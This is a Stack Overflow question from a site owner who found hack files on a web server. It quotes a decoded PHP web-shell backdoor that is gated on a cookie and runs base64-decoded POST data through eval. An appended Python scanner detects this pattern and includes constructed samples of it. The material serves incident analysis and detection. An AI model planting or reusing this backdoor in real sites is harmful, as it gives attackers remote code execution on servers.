PHP hack files found - help decoding and identifying

Posted by akc on Stack Overflow
Published on 2012-04-09T05:26:02Z Indexed on 2012/04/09 5:29 UTC


I found a handful of hack files on our web server. I managed to de-obfuscate them a bit -- they all seem to have a part that decodes into a chunk that looks like:

if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) {echo '<textarea rows=28 cols=80>'; $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) @eval($d); echo '</textarea>';}echo '<form action="" method=post><textarea cols=80 rows=28 name=c></textarea><br><input type=submit></form>';exit;}

But this chunk (decoded above) is usually embedded into a larger code snippet. I've shared the code of one of the files in its entirety here: http://pastie.org/3753704

I can sort of see where this code is going, but definitely not an expert at PHP and could use some help figuring out more specifically what it's doing or enabling. Also, if anyone happens to be familiar with this hack, any information on how it works, and where the backdoor and other components of the hack may be hidden would be super helpful and greatly appreciated.

I tried to Google parts of the code, to see if others have reported it, but only came up with this link: http://www.daniweb.com/web-development/php/threads/365059/hacked-joomla

Thanks!

© Stack Overflow or respective owner
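
For triaging files like the ones described in the post, here is an added example (not part of the original post and not the poster's code): a Python scanner that peels base64 string literals layer by layer and flags any layer where eval() appears together with request input such as $_POST or $_COOKIE, which is the shape of the decoded chunk quoted above. It assumes the obfuscation is nested base64 literals, which the post does not confirm; the function names and the sample inputs are constructed for this example.

```python
import base64
import re

# Quoted string literals that consist only of base64 characters.
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{24,}={0,2})['"]""")
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "request_input": re.compile(r"\$_(?:POST|GET|COOKIE|REQUEST)\b"),
}

def layers(source, max_depth=5):
    """Yield (depth, text) for the source and each base64 literal decoded from it."""
    pending = [(0, source)]
    while pending:
        depth, text = pending.pop()
        yield depth, text
        if depth >= max_depth:
            continue  # bound the work on deeply nested or hostile input
        for match in B64_LITERAL.finditer(text):
            try:
                decoded = base64.b64decode(match.group(1), validate=True).decode("utf-8")
            except ValueError:  # bad padding, or not text once decoded
                continue
            pending.append((depth + 1, decoded))

def scan(source):
    """Return [(depth, indicator names)] for layers that eval request data."""
    findings = []
    for depth, text in layers(source):
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
        if "eval" in hits and "request_input" in hits:
            findings.append((depth, hits))
    return findings

def wrap(php):
    """Build a constructed sample: php hidden in eval(base64_decode('...'))."""
    return "eval(base64_decode('%s'));" % base64.b64encode(php.encode()).decode()

# Constructed samples, shortened from the chunk quoted in the post.
INNER = "if ($_COOKIE['v']=='d') { $d=base64_decode($_POST['c']); if($d) @eval($d); }"
SAMPLE_INFECTED = "<?php " + wrap(wrap(INNER)) + " ?>"
SAMPLE_CLEAN = "<?php echo base64_decode('%s'); ?>" % base64.b64encode(
    b"plain text kept in base64 by a harmless plugin").decode()

if __name__ == "__main__":
    for name, src in [("infected", SAMPLE_INFECTED), ("clean", SAMPLE_CLEAN)]:
        print(name, scan(src))
```

A hit from scan() is a heuristic lead for manual review of that file, not proof of compromise, and a file with no hit may still use an encoding this example does not decode.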
